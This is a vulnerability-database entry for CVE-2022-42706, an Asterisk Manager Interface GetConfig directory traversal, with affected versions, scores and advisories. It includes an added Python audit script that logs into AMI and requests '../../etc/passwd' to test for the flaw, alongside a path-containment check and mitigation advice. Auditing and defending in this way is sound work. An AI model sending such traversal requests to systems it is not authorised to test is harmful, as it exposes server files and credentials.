CVE-2022-42706
Published 2022-12-05
Priority: P427. Severity: medium, base score 4.9 (CVSS 3.1).
Vector: AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:N / A:N
EPSS: 1.09% (61.4th percentile)
An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.
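The script below is an added example written for this page; it is not code from the Asterisk project, the vendor advisory, or any of the trackers quoted here. It does two things a practitioner would want: it audits one AMI account by sending a GetConfig for a Filename outside the configuration directory and classifying the reply, and it shows the kind of resolve-and-contain check on Filename that a server must apply before opening the file (a generic check, not the upstream patch). Assumptions, all labelled in the code: AMI on its default TCP port 5038 and reachable (exposure depends on the enabled, bindaddr and permit/deny settings in manager.conf), an account holding the system or config read permission that GetConfig requires (this is why the vector carries PR:H), the default configuration directory /etc/asterisk, and constructed sample replies rather than captures from a real server.

```python
# Added example (not Asterisk project code). Audits one AMI account for
# CVE-2022-42706 and shows a containment check for the GetConfig Filename.
import os
import socket
from typing import Dict, List

# Assumption: default Asterisk configuration directory; the real value is
# astetcdir in asterisk.conf.
CONFIG_DIR = "/etc/asterisk"


def build_getconfig_action(filename: str, action_id: str = "audit-1") -> bytes:
    """Serialize a GetConfig action. AMI packets are 'Key: Value' lines with
    CRLF endings, terminated by an empty line."""
    lines = ["Action: GetConfig", f"ActionID: {action_id}", f"Filename: {filename}"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_ami_packets(raw: str) -> List[Dict[str, str]]:
    """Split an AMI text stream into packets and each packet into a dict.
    GetConfig keys (Category-000000, Line-000000-000000, ...) are all
    distinct, so nothing is lost by using a dict per packet."""
    packets: List[Dict[str, str]] = []
    for chunk in raw.split("\r\n\r\n"):
        if not chunk.strip():
            continue
        fields: Dict[str, str] = {}
        for line in chunk.split("\r\n"):
            key, sep, value = line.partition(": ")
            if sep:
                fields[key] = value
        packets.append(fields)
    return packets


def is_within_config_dir(config_dir: str, filename: str) -> bool:
    """Containment check a patched server should apply before opening the
    requested file (hypothetical; not the upstream fix). Rejects an empty
    name, absolute paths and any '..' sequence that escapes config_dir.
    normpath keeps this runnable offline; a real server must also resolve
    symlinks (realpath) on the final path before opening it."""
    if not filename:
        return False
    base = os.path.normpath(config_dir)
    # os.path.join discards base when filename is absolute, so '/etc/passwd'
    # lands outside base and fails the commonpath test below.
    candidate = os.path.normpath(os.path.join(base, filename))
    if candidate == base:
        return False
    return os.path.commonpath([base, candidate]) == base


def classify_reply(packets: List[Dict[str, str]], action_id: str = "audit-1") -> str:
    """Classify the server's answer to a GetConfig for a path outside the
    config directory: 'vulnerable' if it answered Success (it opened the
    file), 'rejected' on Error (patched, or the account lacks the system or
    config permission), otherwise 'inconclusive'."""
    for p in packets:
        if p.get("ActionID") != action_id:
            continue
        if p.get("Response") == "Success":
            return "vulnerable"
        if p.get("Response") == "Error":
            return "rejected"
    return "inconclusive"


def audit_ami(host: str, user: str, secret: str, port: int = 5038,
              filename: str = "../../etc/passwd", timeout: float = 5.0) -> str:
    """Log in, send one GetConfig for a path outside the config directory and
    classify the reply. Needs a reachable AMI; use only on systems you are
    authorised to test. Not exercised offline."""
    login = f"Action: Login\r\nUsername: {user}\r\nSecret: {secret}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)  # banner line, e.g. 'Asterisk Call Manager/x.y.z'
        s.sendall(login)
        if b"Response: Success" not in s.recv(4096):
            raise RuntimeError("AMI login failed")
        s.sendall(build_getconfig_action(filename))
        buf, marker = b"", b"ActionID: audit-1"
        # Events (e.g. FullyBooted) may arrive first; read until our reply
        # is present and the buffer ends on a packet boundary.
        while not (marker in buf and buf.endswith(b"\r\n\r\n")):
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
        s.sendall(b"Action: Logoff\r\n\r\n")
    return classify_reply(parse_ami_packets(buf.decode(errors="replace")))


# Constructed sample replies (not captured from a real server) for offline use.
VULNERABLE_REPLY = (
    "Response: Success\r\nActionID: audit-1\r\n"
    "Category-000000: general\r\nLine-000000-000000: foo = bar\r\n\r\n"
)
REJECTED_REPLY = "Response: Error\r\nActionID: audit-1\r\nMessage: Config file not found\r\n\r\n"

if __name__ == "__main__":
    for name in ("extensions.conf", "../../etc/passwd", "/etc/passwd"):
        print(f"{name!r}: allowed={is_within_config_dir(CONFIG_DIR, name)}")
    print(classify_reply(parse_ami_packets(VULNERABLE_REPLY)))
    print(classify_reply(parse_ami_packets(REJECTED_REPLY)))
```

Two points worth keeping in mind when using this. A Success reply is the tell even when no Line-* keys come back: Asterisk's config parser skips lines without an equals sign, so a file such as /etc/passwd may parse to nothing while still having been opened; files whose lines do contain '=' are returned verbatim. And the mitigation for an unpatched host is the usual AMI hygiene: do not grant read = config or read = system to accounts that do not need it, and confine manager.conf with permit/deny ACLs.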
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | asterisk | < 1:16.28.0~dfsg-0+deb11u2 (bullseye) | 1:16.28.0~dfsg-0+deb11u2 (bullseye) |
| sangoma | asterisk | (no range given) | — |
| sangoma | asterisk | >= 0 < 1:16.28.0~dfsg-0+deb11u2 | 1:16.28.0~dfsg-0+deb11u2 |
| sangoma | asterisk | >= 16.0.0 < 16.29.1 | 16.29.1 |
| sangoma | asterisk | >= 17.0.0 < 18.15.1 | 18.15.1 |
| sangoma | asterisk | >= 19.0.0 < 19.7.1 | 19.7.1 |
| sangoma | certified_asterisk | < 18.9 | 18.9 |
| sangoma | certified_asterisk | (no range given) | — |
Notes on the ranges: 1:16.28.0~dfsg-0+deb11u2 is a Debian bullseye package version, not an upstream Sangoma release, even in the row keyed to sangoma. The >= 17.0.0 row spans the 17.x and 18.x series; 17 is end of life, so the fix for it is an upgrade to 18.15.1 or later. Asterisk 20 is not named in the description but is fixed in 20.0.1 (the release Debian sid received, see below). The certified row's fixed-in value of 18.9 conflicts with the description, which names 18.9-cert1 as affected; the vendor advisory AST-2022-009 lists 18.9-cert2 as the corrected certified release.
CVSS provenance
NVD (v3.1): 4.9 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
OSV: 4.9 MEDIUM
Debian: 4.9 MEDIUM
GHSA
GHSA-phq9-6f4r-97wc (ghsa_unreviewed, 2022-12-05): CVE-2022-42706, MEDIUM, CWE-22 (path traversal). Description as above.
OSV
CVE-2022-42706 (osv, 2022-12-05, CVSS 4.9, MEDIUM). Description as above.
Debian
CVE-2022-42706: asterisk (vendor_debian, 2022, CVSS 4.9, MEDIUM). Description as above.
Scope: local
bullseye: resolved (fixed in 1:16.28.0~dfsg-0+deb11u2)
sid: resolved (fixed in 1:20.0.1~dfsg+~cs6.12.40431414-1)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References:
https://downloads.asterisk.org/pub/security/AST-2022-009.html
https://lists.debian.org/debian-lts-announce/2023/02/msg00029.html
https://www.debian.org/security/2023/dsa-5358